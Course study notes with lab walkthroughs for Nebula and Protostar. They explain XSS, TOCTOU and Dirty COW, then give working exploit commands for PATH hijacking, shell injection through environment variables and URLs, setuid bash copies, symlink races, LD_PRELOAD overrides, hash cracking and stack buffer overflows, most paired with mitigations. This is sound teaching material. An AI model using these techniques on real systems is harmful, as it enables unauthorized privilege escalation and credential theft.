# Secure Software Development: Notes & Exercise Writeups

Personal study notes and solved exercises for the *Secure Software Development* course.
The material covers core security concepts, basic binary exploitation, and web vulnerabilities, using the **Nebula**, **Protostar**, and **Web For Pentester** training environments.

> **Disclaimer:** This material is collected for **educational and personal study purposes only**. Every technique described was performed in intentionally vulnerable lab environments (Nebula, Protostar, Web For Pentester) or on machines I own. Do not apply any of this to systems you are not explicitly authorized to test; doing so is illegal.

---

## Table of Contents

- [Part I – Core Concepts](#part-i--core-concepts)
  - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss)
  - [TOCTOU – Time of Check, Time of Use](#toctou--time-of-check-time-of-use)
  - [Dirty COW (CVE-2016-5195)](#dirty-cow-cve-2016-5195)
  - [Static Analysis](#static-analysis)
  - [Dynamic Analysis](#dynamic-analysis)
  - [Penetration Testing](#penetration-testing)
- [Part II – Nebula](#part-ii--nebula)
- [Part III – Protostar](#part-iii--protostar)
- [Part IV – Web For Pentester](#part-iv--web-for-pentester)
- [Appendix – Exam section index](#appendix--exam-section-index)

---

# Part I – Core Concepts

## Cross-Site Scripting (XSS)

*How does an XSS attack work? Where does the problem lie? What is the vulnerability? How is it fixed?*

A Cross-Site Scripting (XSS) attack occurs when a web application lets a user submit unsanitized data, such as JavaScript code. When this happens, the vulnerable server embeds that content in the response that builds the web page. The server itself does not execute the malicious code: its job is only to return it inside the page. It is the user's browser that plays the active role: once it receives the page it automatically runs all the code present, including any attacker-injected scripts, because it trusts the content provided by the server.

There are two main types of XSS: **reflected** and **persistent**. In reflected XSS the code is returned immediately in the response and requires the victim to visit a link specially crafted by the attacker. In persistent XSS the malicious code is stored by the server (for example in a database) and then automatically shown to every user who visits the page, with no need to share a link.

**Mitigation:** sanitize and validate all user input, set a **Content Security Policy (CSP)** to block execution of unauthorized scripts, use **secure frameworks** that correctly handle output escaping, and keep libraries and components up to date.
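As a minimal sketch of the output-escaping part of that mitigation, the snippet below uses Python's standard `html.escape`. The `render_greeting` helper is a hypothetical name chosen for illustration; a real application would normally rely on its template engine's auto-escaping instead.

```python
import html

def render_greeting(name: str) -> str:
    """Build an HTML fragment, escaping the untrusted value on output."""
    # html.escape converts &, <, > and (by default) both quote characters
    # into entities, so the browser treats the value as text, not markup.
    return "<p>Hello " + html.escape(name) + "</p>"

print(render_greeting("<script>alert('XSS')</script>"))
```

The injected tag reaches the browser as inert text, so nothing executes.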

## TOCTOU – Time of Check, Time of Use

These are flaws caused by synchronization problems in multitasking, multi-user systems. The system checks a security-relevant state at one point in time and later uses the result of that check, but in the interval between the check and the use the conditions may change without raising any alarm. To fix or avoid it, you can use atomic transactions or restructure the program logic so it is not vulnerable to race conditions.
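One common way to restructure the logic is to open the object first and then run the check on the open handle rather than on the path. The sketch below assumes a POSIX system (it relies on `os.O_NOFOLLOW`), and `read_regular_file` is a hypothetical helper name.

```python
import os
import stat
import tempfile

def read_regular_file(path: str) -> bytes:
    """Open first, then check the object that was actually opened."""
    # O_NOFOLLOW makes open() fail if the final path component is a symlink.
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        # fstat() inspects the open descriptor, so the answer cannot be
        # invalidated by someone renaming or relinking the path afterwards.
        info = os.fstat(fd)
        if not stat.S_ISREG(info.st_mode):
            raise PermissionError("not a regular file")
        return os.read(fd, info.st_size)
    finally:
        os.close(fd)
```

Because the check and the use both refer to the same descriptor, there is no interval in which the path can be swapped.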

## Dirty COW (CVE-2016-5195)

Dirty COW is a Linux kernel vulnerability that lets a local user gain elevated (root) privileges by exploiting a **race condition** in the **Copy-On-Write (COW)** mechanism used in **virtual memory** management.

To understand the problem you have to start from how memory works in Unix-like systems. When a process calls `fork()`, a child process is created that shares **the same memory pages** as the parent, but in **read-only** mode. This is an optimization called *Copy-On-Write*: as long as no one writes, the memory stays shared. But if either process tries to modify a page, the kernel creates a **private copy (a "dirty copy")** of the page just for that process.
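The intended copy-on-write behavior can be observed from user space with a private file mapping. This is a small illustration of the normal, non-buggy case, assuming Python's `mmap.ACCESS_COPY` mode; the function name is hypothetical.

```python
import mmap
import os
import tempfile

def private_write_leaves_file_intact() -> tuple:
    """Write through a copy-on-write mapping and report both views."""
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, b"original")
        # ACCESS_COPY requests a private (copy-on-write) mapping: writes go
        # to a page copy owned by this process, never back to the file.
        with mmap.mmap(fd, 0, access=mmap.ACCESS_COPY) as view:
            view[0:8] = b"modified"
            in_memory = bytes(view[0:8])
        with open(path, "rb") as f:
            on_disk = f.read()
        return in_memory, on_disk
    finally:
        os.close(fd)
        os.remove(path)

print(private_write_leaves_file_intact())
```

The process sees its own modified copy while the file on disk keeps its original bytes. That separation is the guarantee the race condition breaks.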

The bug lies in the fact that an unprivileged process can **map a read-only file into memory** (for example a binary or a root-only configuration file) and then try to modify it by abusing a concurrency condition.

The attack exploits three key components:

1. **`mmap()`**: the process maps the read-only file (e.g. `/etc/passwd`) into memory as a private mapping, obtaining a pointer to a memory region representing the file.
2. **Threads**: the process starts separate threads that manipulate the memory in parallel (typically with `pthread_create()`; `fork()` would create a new process, not a thread).
3. **`madvise(addr, length, MADV_DONTNEED)`**: the `madvise()` syscall with the `MADV_DONTNEED` flag tells the kernel that the mapped pages can be dropped (invalidated) from cache, as if no longer needed.

This triggers a **race condition**: while one thread calls `madvise()` on that memory region, another thread repeatedly tries to write to it using `ptrace()` or `/proc/self/mem`. The kernel, trying to invalidate and reload the page from the shared copy, gets tricked and **allows writing to the original copy of the file**, even though the user has no permission to modify it. In effect, you manage to **write to a protected read-only file**, breaking the isolation enforced by Unix permissions.

The name "Dirty COW" comes from exactly this: the page's "dirty copy" caused by the bug in Copy-On-Write.

## Static Analysis

**Static code analysis** is a technique that inspects a program, at either **source code** or **compiled binary** level, **without executing it**. This kind of analysis serves several purposes: understanding how a piece of software works, assessing its quality, finding logical and structural errors, and, most relevant to this course, detecting **potential security vulnerabilities**.

As software systems have evolved, static analysis is now also applied in **safety-critical** domains such as automotive or avionics, where it is essential to guarantee that the software cannot harm people or property.

The main **static analysis techniques** include:

- **Reverse engineering**, used to understand a program's behavior starting from a binary file.
- **Metrics computation**, such as **McCabe's cyclomatic complexity**, which measures the logical complexity of functions to identify critical points in the code.
- **Formal methods**, which apply mathematical tools to prove correctness properties of the code.
- **Static security testing**, which inspects source code looking for **toxic patterns**: code fragments that may indicate vulnerabilities (e.g. improper use of `system()`, `exec()`...).
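To make the metrics item concrete, here is a rough sketch that approximates McCabe's cyclomatic complexity as one plus the number of decision points, using Python's `ast` module on Python source. The set of node types counted is a simplifying assumption, not a full implementation of the metric.

```python
import ast

# Node types that open an extra path through the code (simplified set).
BRANCH_NODES = (ast.If, ast.For, ast.While, ast.ExceptHandler, ast.IfExp)

def cyclomatic_complexity(source: str) -> int:
    """Approximate McCabe complexity as 1 + number of decision points."""
    tree = ast.parse(source)
    decisions = 0
    for node in ast.walk(tree):
        if isinstance(node, BRANCH_NODES):
            decisions += 1
        elif isinstance(node, ast.BoolOp):
            # `a and b and c` adds two extra short-circuit branches.
            decisions += len(node.values) - 1
    return 1 + decisions

SAMPLE = """
def check(user, pw):
    if not user or not pw:
        return False
    for attempt in range(3):
        if pw == "secret":
            return True
    return False
"""
print(cyclomatic_complexity(SAMPLE))  # 5: two ifs, one `or`, one for, plus 1
```

Functions with a high score have many paths to review and test, which is why the metric is used to pick out critical points.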

Analysis can be **manual** or **automated**. In a security context you typically start with three steps:

1. Identify the programming language used.
2. Identify the source files to analyze.
3. Search for suspicious or vulnerable patterns in the code.

For example, when analyzing an application like *Web For Pentester*, you use tools like `find`, `sed`, `sort`, `uniq` to list all files and compute the frequency of the languages used. Using regular expressions (`grep`) you look for **toxic patterns** such as calls to dangerous functions (`system`, `exec`, etc.), also looking for the **dynamic concatenations** typical of languages like PHP (using the `.` operator).

A pattern can be **suspicious but not always vulnerable**: to be sure, **dynamic analysis** is needed, which studies the actual behavior of the code at runtime.
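The `grep`-style search described above can be sketched with Python's `re` module. The regular expression below is a hypothetical toxic pattern (a command-execution call whose argument contains a `.` concatenation with a variable), written only for illustration; real rule sets are broader.

```python
import re

# Hypothetical pattern: a call to a command-execution function whose
# argument list contains PHP's `.` concatenation with a variable.
TOXIC = re.compile(r"\b(system|exec|shell_exec|passthru)\s*\([^)]*\.\s*\$\w+")

def find_toxic_lines(source: str) -> list:
    """Return (line_number, text) pairs for lines matching the pattern."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        if TOXIC.search(line):
            hits.append((number, line.strip()))
    return hits

PHP_SAMPLE = '''<?php
system("ls -l");
system("ping -c 2 " . $_GET["ip"]);
echo "done";
'''
print(find_toxic_lines(PHP_SAMPLE))
```

Only the line that concatenates request data into the command is reported; the constant `system("ls -l")` call is not. A hit is still only a suspicion until the behavior is confirmed at runtime.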

### Automated tools: Semgrep

One of the most powerful static-analysis tools is **Semgrep** ("semantic grep"), an advanced tool able to recognize toxic patterns the way `grep` would, but with **awareness of the syntactic and semantic structure of the language**.

Semgrep can analyze related functions even when the code is far apart, distinguish between local and global variables, and identify dangerous use of functions in critical contexts. It uses a system of **rules written in YAML**, which specify:

- a unique ID,
- a description of the pattern,
- the severity level (info, warning, error),
- compatibility with various languages,
- and of course the pattern to look for.

**Rules** can be simple (a single line of code) or complex (blocks of code), and can contain **ellipses (`...`)** as wildcards, or **variables** (e.g. `$VAR`) that capture and reuse code fragments found. You can write custom rules (even **mimicking the paid ones** in Semgrep's freemium version) and use public online repositories to reuse existing rules.

## Dynamic Analysis

Dynamic analysis is the set of techniques that observe and inspect a program while it is running, in order to understand its behavior and detect logical, performance, or security errors. Unlike static analysis, here the code is actually executed: for this reason testing fully qualifies as a dynamic technique.

An important concept tied to dynamic testing is **code coverage**, i.e. the percentage of code actually exercised by the tests. The higher the coverage, the more complete the analysis.

Main dynamic-analysis techniques:

1. **Symbolic execution**: the program is explored with symbolic rather than concrete inputs, to determine which inputs activate which code paths.
2. **Memory analysis**: memory allocation, use, and release operations are observed directly, looking for errors like leaks, use-after-free, or buffer overflows.
3. **Fuzzing**: automatically and randomly mutated inputs are sent to the program to discover unexpected behavior or vulnerabilities, such as crashes or command injection.

These techniques can be manual or automated, but in the case of fuzzing the very nature of the approach usually makes it automated.
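A toy illustration of the fuzzing idea, assuming a deliberately fragile target: `parse_record` and `fuzz` are hypothetical names, and the fixed seed is there only to keep the run reproducible. Real fuzzers add coverage feedback and input mutation on top of this loop.

```python
import random

def parse_record(data: bytes) -> bytes:
    """Toy target: first byte is a length, the rest is the payload."""
    length = data[0]                 # IndexError on empty input (the bug)
    payload = data[1:1 + length]
    if len(payload) != length:
        raise ValueError("truncated record")   # handled, expected error
    return payload

def fuzz(target, rounds: int = 200, seed: int = 0) -> list:
    """Feed random inputs and collect those that raise unexpected errors."""
    rng = random.Random(seed)
    crashes = []
    for _ in range(rounds):
        size = rng.randint(0, 8)
        data = bytes(rng.randrange(256) for _ in range(size))
        try:
            target(data)
        except ValueError:
            pass                     # documented failure mode, not a bug
        except Exception as error:   # anything else counts as a finding
            crashes.append((data, type(error).__name__))
    return crashes

print(fuzz(parse_record)[:1])
```

The only inputs reported are the empty ones, which the parser never anticipated.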

## Penetration Testing

**Penetration testing** is a practice used to assess the **security of a computer system by simulating real attacks**. The different types of testing are often confused: it is important to distinguish between **vulnerability assessment**, an actual **penetration test**, and a **red team engagement**, which represent increasing levels of invasiveness and depth.

### Vulnerability Assessment

A preliminary, non-invasive phase whose goal is to:

- identify the machines and services present on the network;
- analyze the available assets;
- compile a list of potential vulnerabilities.

This activity does not involve accessing or exploiting the vulnerabilities. It only produces a **map of the security posture** of the infrastructure. It is often automated, for example with tools like **Nessus**, and lets you detect **toxic patterns** or weak signals in the system.

### Penetration Test

Starting from the information gathered in the vulnerability assessment, the penetration test gets to the heart of things, trying to **actually exploit** the identified vulnerabilities in order to:

- gain access to internal systems;
- perform **privilege escalation** up to root or administrator;
- reach other networks (lateral movement);
- enable **pivoting**, i.e. using a compromised machine as a foothold to attack networks that would otherwise be unreachable.

It is a potentially invasive activity that can **disrupt production services**, and precisely for this reason **few clients actually accept it**. In many cases an assessment is sold as if it were a full penetration test.

To run a penetration test you use semi-automated tools such as:

- **custom scripts**,
- **frameworks** (e.g. **Metasploit**) that handle all phases: enumeration, exploit, post-exploitation, escalation, lateral movement.

### Red Team Engagement

A complete, realistic simulation of a **targeted** cyber attack, emulating the behavior of **real attackers** with advanced techniques. Unlike a penetration test (which explores the whole environment), a red team focuses on **a specific objective**, such as access to the executives' machines.

Everything is allowed: phishing, use of unknown exploits, credential reuse, and attempts at **persistence** in the network without being detected. The goal is also to assess **how effective the defense team (Blue Team) is** at detecting and countering the attack. This kind of simulation requires a **formal contract**, because without consent it would be **a criminal offense**.

---

# Part II – Nebula

## Level 00

Level 00 is based on a permissions vulnerability, specifically the use of the SUID bit. There is a file on the system that is executable but, thanks to the SUID bit, runs with the permissions of the file's owner, in this case `flag00`.

To find the file:

```bash
find / -perm -4000 -user flag00 2>/dev/null
```

**Mitigation:** manage permissions more carefully: remove the SUID bit when it is not needed, and if it is needed, restrict who can access the file. (`find` can also use `-perm -2000` for the SGID bit or `-perm -6000` for files with both bits set.)
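For auditing, the same search can be sketched with Python's `os` and `stat` modules. `special_bits` and `scan` are hypothetical helper names; the walk silently skips unreadable entries, much as `2>/dev/null` hides errors in the `find` command.

```python
import os
import stat

def special_bits(mode: int) -> list:
    """Name the setuid/setgid bits present in a st_mode value."""
    bits = []
    if mode & stat.S_ISUID:      # octal 4000, what `-perm -4000` matches
        bits.append("setuid")
    if mode & stat.S_ISGID:      # octal 2000
        bits.append("setgid")
    return bits

def scan(root: str) -> list:
    """Walk a tree and list regular files carrying either bit."""
    found = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue             # unreadable entry, skip it
            if stat.S_ISREG(mode) and special_bits(mode):
                found.append((path, special_bits(mode)))
    return found
```

Calling `scan("/usr/bin")` on a typical Linux system would list binaries such as `passwd`, though the exact result depends on the machine.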

## Level 01

Level 01 is based on a vulnerability inside a C program that calls `system()` and, instead of running `echo` by absolute path, launches it through `/usr/bin/env`, which looks the name up in `PATH`. This means that if the attacker controls `PATH`, they can have a malicious program with the same name as `echo` executed. The program runs with `flag01`'s permissions thanks to `setresgid`/`setresuid`, which set all credentials to the effective ones (since the SUID bit is set).

To build the exploit, create a malicious `echo` (or a symlink to `getflag`) in a directory you control, then prepend it to `PATH`:

```bash
echo "/bin/sh" > /tmp/echo      # or: ln -sf /bin/getflag /tmp/echo
chmod +x /tmp/echo
export PATH=/tmp:$PATH
./flag01
```

**Mitigation:** do not launch commands through `/usr/bin/env`; use absolute paths. Avoid `system()` and prefer `execve()`, which executes a binary or script directly without spawning a new shell; sanitize the environment before calling external commands; remove the SUID bit.
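The effect of a controlled `PATH` can be observed harmlessly with `shutil.which`, which performs the same kind of lookup. This is a sketch assuming a POSIX system; the directory, the planted file, and the `trusted` search path are all created or chosen just for the demonstration.

```python
import os
import shutil
import stat
import tempfile

def resolve(command: str, path: str):
    """Return the file a PATH lookup would pick for `command`."""
    return shutil.which(command, path=path)

# Create a directory holding an executable file named like the real tool.
attacker_dir = tempfile.mkdtemp()
fake = os.path.join(attacker_dir, "echo")
with open(fake, "w") as handle:
    handle.write("#!/bin/sh\n")
os.chmod(fake, stat.S_IRWXU)

trusted = "/usr/bin" + os.pathsep + "/bin"   # assumed system directories
print(resolve("echo", trusted))                            # normally the system echo
print(resolve("echo", attacker_dir + os.pathsep + trusted))  # the planted file
```

Whichever directory comes first wins, which is why a privileged program should never resolve command names through a caller-supplied `PATH`.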

## Level 02

Level 02 is based on a vulnerability inside a C program that reads the `USER` value directly from the environment and inserts it into the command string passed to `system` without any check. If a malicious actor changes it to:

```bash
USER="hacker; /bin/sh"
```

the command becomes `/bin/echo hacker; /bin/sh is cool`. The shell runs the `echo` but also opens a shell, with `flag02`'s permissions since the program is SUID.

**Mitigation:** sanitize the environment and inputs, use syscalls like `execve()` that do not spawn a new shell, remove the SUID bit.
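The difference between pasting a value into a shell line and quoting it can be shown without running anything. The sketch below only builds the command strings; `unsafe_command` and `safe_command` are hypothetical names, and `shlex.quote` is Python's standard shell-quoting helper.

```python
import shlex

def unsafe_command(user: str) -> str:
    """Mirror the vulnerable pattern: paste the value into a shell line."""
    return "/bin/echo " + user + " is cool"

def safe_command(user: str) -> str:
    """Quote the value so the shell sees it as one literal word."""
    return "/bin/echo " + shlex.quote(user) + " is cool"

value = "hacker; /bin/sh"
print(unsafe_command(value))   # /bin/echo hacker; /bin/sh is cool
print(safe_command(value))     # /bin/echo 'hacker; /bin/sh' is cool
```

Quoting is a fallback. Passing an argument list to an exec-style call, with no shell involved, avoids the parsing problem altogether.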

## Level 03

Level 03 has multiple vulnerabilities. There is a world-writable directory and, next to it, a script that executes the files inside that directory and deletes them once finished. Nebula tells us this script runs via cron, probably with the owner's permissions (`flag03`). This combination is perfect for an exploit: create a script inside the world-writable directory that copies `/bin/bash` and sets the SUID bit, so that when run we get the owner's permissions.

Inside the script placed in the world-writable directory:

```bash
cp /bin/bash /home/flag03/bash    # NB: not in /tmp, which clears the SUID bit
chmod u+s /home/flag03/bash
```

Once cron runs it:

```bash
./bash -p     # -p so privileges are not dropped
```

**Mitigation:** change the directory permissions so it is not world-writable; manage access to `flag03`'s directory more strictly.

## Level 04

Level 04 has a program that takes a file as input and reads its content. There is a small check on the file name, which must not be `token` or it fails. The vulnerability is the shallowness of that check: it only inspects the name string passed on the command line, while symbolic links are resolved by the kernel later, during `open()`. So if you create a symlink to the `token` file under a different, harmless-looking name, the program will read it anyway.

```bash
ln -sf /home/flag04/token /tmp/fake
```

**Mitigation:** resolve the path with `realpath()`, avoid string-based checks, and use `lstat()` to detect symbolic links.
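A small sketch of why the string check fails and what resolving the path changes, assuming a POSIX system with symlink support. Both function names are hypothetical, and the files live in a throwaway temporary directory.

```python
import os
import tempfile

def naive_allowed(path: str) -> bool:
    """String check on the file name the caller typed (the flawed approach)."""
    return "token" not in os.path.basename(path)

def resolved_allowed(path: str) -> bool:
    """Check the final component after symlinks have been resolved."""
    return os.path.basename(os.path.realpath(path)) != "token"

workdir = tempfile.mkdtemp()
secret = os.path.join(workdir, "token")
open(secret, "w").close()
alias = os.path.join(workdir, "fake")
os.symlink(secret, alias)

print(naive_allowed(alias), resolved_allowed(alias))   # True False
```

Resolving the path and then opening it is still two separate steps, so this check alone does not remove a race; it only closes the naming loophole.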

## Level 05

Level 05 has a vulnerability due to excessive asset exposure. In `flag05`'s home there is a `.backup.tgz` file. It is not visible with plain `ls`; you need `ls -a`, because in the 1970s `ls` always listed the current and parent directory entries (`.` and `..`), and the fix was to hide every entry whose name starts with a dot.

Copy the `.tgz` to a directory like `/tmp` or your home and extract it:

```bash
tar -xf backup.tgz
```

This yields a `.ssh` directory containing an SSH RSA key pair; with the private key you can connect without knowing the password:

```bash
ssh -i id_rsa flag05@localhost      # or: ssh -p <port> -i id_rsa flag05@localhost
```

**Mitigation:** lower access privileges on directories holding sensitive data, or remove files containing sensitive data from the system.

## Level 06

In level 06, Nebula hints that the problem concerns an "old" password-management system, so the first thing to do is check `/etc/passwd`, because old UNIX systems stored user and hashed-password information there. Reading the file shows a password hash stored directly in `flag06`'s entry. With `hashid` you can determine the hash type and its hashcat mode number, which matters because, with hashcat and a dictionary like `rockyou`, you can run a dictionary attack:

```bash
hashcat -a 0 -m 1500 <hash_file> rockyou.txt
```

If the hash was already cracked in a previous run, the command stops immediately and must be re-run with `--show` to print the recovered password.

**Mitigation:** always make sure not to leave sensitive information exposed, especially after integrating with legacy systems. Here, the hash should have been placed directly in `/etc/shadow`, accessible only by root, to avoid exposure.

## Level 07

Useful checks:

```bash
ps -ef | grep flag07              # is the web server running?
grep -v '^#' thttpd.conf          # read config without comment lines
```

Level 07 has a **command injection** vulnerability caused by a Perl program that pings a host address passed in the `$host` variable. Looking at the actual code, `$host` is never checked or sanitized, and backticks are used, which in Perl execute a shell command, so anything inside is interpreted by the shell. Next to this program there is an `httpd` config file (readable) showing the listening port and the user it runs as (`flag07`). Exploit:

```bash
echo "GET /index.cgi?Host=8.8.8.8%3Bgetflag" | nc localhost 7007
```

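Use `%3B` instead of a literal `;`: the semicolon is a special character in a query string (it can act as a parameter separator), so it would be interpreted and stripped before reaching `$host`.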

**Mitigation:** lower the privileges on the config file, filter the input, and do not use backticks or `system` with external input.
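Two pieces of this level can be sketched with the Python standard library: how the `%3B` encoding is produced, and what "filter the input" could look like for a value that is supposed to be an IP address. `encode_param` and `is_plain_ip` are hypothetical helper names.

```python
import ipaddress
from urllib.parse import quote

def encode_param(value: str) -> str:
    """Percent-encode every reserved character in a query value."""
    return quote(value, safe="")

def is_plain_ip(value: str) -> bool:
    """Accept the value only if it parses as an IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

print(encode_param("8.8.8.8;getflag"))   # 8.8.8.8%3Bgetflag
print(is_plain_ip("8.8.8.8"), is_plain_ip("8.8.8.8;getflag"))  # True False
```

Validating against the expected type rejects the payload outright, which is more robust than trying to list dangerous characters.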

## Level 08

Level 08 is again excessive asset exposure: a world-readable file in `flag08`'s directory, created by root, with a `.pcap` extension. Running `apropos pcap` reveals it relates to network traffic. Move it to a machine with Wireshark and study the capture.

`Statistics > Protocol Hierarchy` shows packet types and sizes โ€” here almost all are small, stable TCP packets. `Analyze > Follow > TCP Stream` reveals a login pattern: one side sends a character and gets it echoed back (the username being reflected on the connecting terminal). The password is **not** reflected and appears only once. Watch out for dots in the password caused by the ASCII representation: check their hex value โ€” here it is `7F`, which is the DEL key.

Reproducing the input sequence yields `flag08`'s password, `backd00Rmate`.
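Replaying the keystrokes can be sketched as follows. The byte string is an assumed reconstruction of the captured stream, chosen to be consistent with the password stated above; the exact bytes should be read from the capture itself.

```python
DEL = 0x7F  # shown as "." in the ASCII pane of the capture

def replay_keystrokes(raw: bytes) -> str:
    """Apply each DEL byte as a backspace over the characters typed so far."""
    typed = []
    for byte in raw:
        if byte == DEL:
            if typed:
                typed.pop()
        else:
            typed.append(chr(byte))
    return "".join(typed)

# Assumed keystroke stream (illustrative, see the note above).
captured = b"backdoor\x7f\x7f\x7f00Rm8\x7fate"
print(replay_keystrokes(captured))   # backd00Rmate
```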

**Mitigation:** delete network captures and don't leave files like this that let credentials be recovered; if they can't be deleted, at least set proper permissions, and use encrypted communication between assets with appropriate protocols.

## Level 09

Level 09 is a setuid C program that acts as a wrapper around PHP code. Running the binary invokes a PHP script with elevated privileges (user `flag09`). The goal is to exploit a flaw in the PHP code to run an arbitrary command (specifically `getflag`) with `flag09`'s permissions.

Key operations in the PHP code:

- **File read:** `file_get_contents($filename)` reads the entire content of the file passed as the first argument (user-controlled).
- **Regex substitution:** `preg_replace` with the `/e` modifier is applied to every match of the pattern `(\[email (.*)\])`. The replacement is `spam("\\2")`, so the second captured group (the text after `email `) is passed to `spam()`. Because of `/e`, the replacement string is evaluated as PHP code, which is the security flaw when the input is not strictly validated.
- **Unused `$use_me` parameter:** the `markup` function takes two parameters (`$filename` and `$use_me`) but never uses `$use_me`. This is a hint: it could be exploited indirectly in the evaluated expression.
- **`spam` obfuscation function:** replaces `.` with `" dot "` and `@` with `" AT "`. It plays a minor role here (it does not significantly alter a payload without `.` or `@`).

To build the exploit we abuse PHP features. Using the **double-curly-brace trick** `{${...}}` we can force execution of `phpinfo()` by setting the input file to `[email {${phpinfo()}}]`, which works. But `[email {${system("getflag")}}]` fails with a parse error because the inner quotes in `system("...")` are mishandled in the eval. We can instead leverage the unused `$use_me` parameter to pass the command:

```
[email {${system($use_me)}}]
./flag09 /tmp/test.txt getflag
```

An alternative solution uses **backticks** (in PHP they work like `shell_exec`):

```
[email ${`cp /bin/bash /home/flag09/bash && chmod u+s /home/flag09/bash`}]
```

**Mitigation:** remove the `/e` modifier in `preg_replace` (which evaluates the second argument as PHP code via `eval()`) and replace it with `preg_replace_callback`, which evaluates nothing as PHP code; sanitize inputs.

## Level 10

Level 10 has a binary that takes a file path and an IP address and, if the caller has permission to read the file, sends its content to that host over a network connection. The vulnerability is visible in the source: a lot happens between the file-accessibility check and the actual use of the file (including expensive operations such as a print forced by an `stdout` flush). This is a **TOCTOU (Time of Check, Time of Use)** vulnerability. The input is not validated before use, and the directory also contains a `token` file with `flag10`'s access credentials.

Exploiting it needs 4 shells:

**Shell 1:** create two dummy files, `faketoken` and an empty `link`, then a `link.sh` script:

```bash
#!/bin/bash
while true; do
  ln -sf /tmp/faketoken /tmp/link
  ln -sf /home/flag10/token /tmp/link
done
```

This swaps the symlink between the file we can access and the one we cannot but want to read. Make it executable: `chmod +x /tmp/link.sh`.

**Shell 2:** a `server.sh` that listens on the port used by the program and writes the read output to `server.txt`:

```bash
#!/bin/bash
while true; do
  nc.traditional -vlp 18211 >> /tmp/server.txt
done
```

**Shell 3:** a `run.sh` that launches the program via `nice`, which sets the priority level; we want maximum TOCTOU exposure, so we use the lowest priority:

```bash
#!/bin/bash
while true; do
  nice -n 19 /home/flag10/flag10 /tmp/link 127.0.0.1
done
```

**Shell 4:** after starting the first three in order, read the output produced by shell 2 to confirm the symlink swap worked and printed the token's content:

```bash
tail -f /tmp/server.txt
```

**Mitigation:** drop privileges and remove access to the token; shrink the TOCTOU window by bringing the check and use operations closer together; validate inputs and, for example, refuse symbolic links by using `lstat()` (which reads a file's metadata).

## Level 13

Level 13 has a binary that checks whether the user running it has real UID = 1000, using `getuid()`. The vulnerability is that the check relies on a function in the dynamic libc, which can be manipulated through the dynamic linker (`ld.so`) behavior, exploiting the `LD_PRELOAD` environment variable. `LD_PRELOAD` forces the dynamic linker to load a specific library before the others; if that library defines a function with the same name as a libc function, the linker uses our version instead of the standard one.

Create a `getuid.so` library from a small C program (after checking how `getuid()` is declared via `man getuid`):

```c
#include <sys/types.h>  /* uid_t */
#include <unistd.h>     /* getuid() prototype */
uid_t getuid(void) {
    return 1000;
}
```

Compile it (`-shared` produces a runtime-linkable, shareable object; `-fPIC` produces position-independent, relocatable code):

```bash
gcc -fPIC -shared -o getuid.so getuid.c
LD_PRELOAD=./getuid.so ./flag13
```

This yields the token.

> **Note on the `ld.so` safety check:** for setuid/setgid binaries the dynamic linker refuses to preload a library unless the binary and the library have matching privilege levels: both low (no SUID) or both high (with SUID). Running the original SUID binary with `LD_PRELOAD` therefore fails. To proceed, either add the SUID bit to `getuid.so` (only possible as root) or remove the SUID bit from the binary (copying `flag13` is enough, since the copy does not keep the bit), then run the copy with `LD_PRELOAD` set.

**Mitigation:** use stronger authentication, disable `LD_PRELOAD` for sensitive binaries, and do not embed tokens in plaintext in your code.

---

# Part III – Protostar

> **General approach for all stack levels.** If you don't have the source, find the buffer size in `gdb`: disassemble the function containing the buffer and `gets`, measure the distance from the `sub` (space reserved on the stack for locals) to where the buffer address is loaded (`lea`); watch for other variables (visible from the `mov`). Remember the architecture is **little-endian**, so multi-byte values are written least-significant-byte first.
>
> **General mitigation for all stack levels:** replace `gets` with safer functions like `fgets()`; use compile-time protections such as stack canaries; use memory-safe languages. From Stack 4 onward, also use a shadow stack and ASLR; from Stack 5, also Data Execution Prevention (NX / no-execute).

## Stack 0

Vulnerability due to `gets`, which reads input without bounds checking (it reads until EOF or newline). After finding the buffer size, overflow it by one to flip the adjacent variable and pass the check:

```bash
python -c "print('a'*65)" | /opt/protostar/bin/stack0
```

## Stack 1

Vulnerability due to `strcpy`, which copies the input into the buffer with no checks. The goal is not just to write any value but to set the `modified` variable to `0x61626364`.

Find the buffer size (64), then decode the target value:

```bash
python -c "import codecs; print(repr(codecs.decode('61626364','hex')))"   # -> 'abcd'
./stack1 $(python -c "print('a'*64+'dcba')")
```

We write `61626364` reversed (`dcba`) because the architecture is little-endian.
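The byte reversal does not have to be done by hand. The sketch below uses `struct.pack` with the `<I` format (little-endian, unsigned 32-bit); it is written for Python 3, unlike the Python 2 one-liners used on the Protostar VM, and the helper names are hypothetical.

```python
import struct

def le32(value: int) -> bytes:
    """Pack a 32-bit value least-significant byte first."""
    return struct.pack("<I", value)

def overflow_payload(buffer_size: int, value: int) -> bytes:
    """Filler up to the end of the buffer, then the value to plant."""
    return b"a" * buffer_size + le32(value)

print(le32(0x61626364))                   # b'dcba'
print(overflow_payload(64, 0x61626364))
```

The same helper works for addresses: packing an address this way yields exactly the byte order that must appear in the input.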

## Stack 2

Same as Stack 1 (`strcpy` with no input check), but the source is the `GREENIE` environment variable, so the overflow must go through it.

Find the buffer size, then decode the target value `0x0d0a0d0a` (which is `\r\n\r\n`):

```bash
python -c "import codecs; print(repr(codecs.decode('0d0a0d0a','hex')))"
GREENIE=$(python -c 'print "A"*64 + "\n\r\n\r"') /opt/protostar/bin/stack2
```

Written reversed because of little-endian.

## Stack 3

The goal is to use a buffer overflow to overwrite a function pointer with the address of the `win` function.

Find the buffer size, get the function address (`p win` in `gdb`), then:

```bash
python -c "print('a'*64+'\x24\x84\x04\x08')" | /opt/protostar/bin/stack3
```

## Stack 4

Similar to Stack 3, but instead of assigning a function address to a variable, we overwrite the `main` return address, so we must be sure of the buffer size and especially the buffer-to-return-address distance.

For a precise calculation: disassemble `main`, set a breakpoint on the `gets` line to read the up-to-date buffer address (in `eax`, via `info register`), print the return address with `p $ebp+4`, then compute the distance in Python and print the `win` address (`p win`). Final exploit:

```bash
python -c "print('a'*<distance> + '<win address, little-endian bytes>')" | ./stack4
```

## Stack 5

More complex: the `gets` vulnerability now requires injecting **shellcode** into the buffer. Several factors matter: the buffer-to-return-address length, using shellcode of an appropriate size (too large causes a segfault), and the actual buffer start address (used to overwrite the return address so the injected shellcode runs).

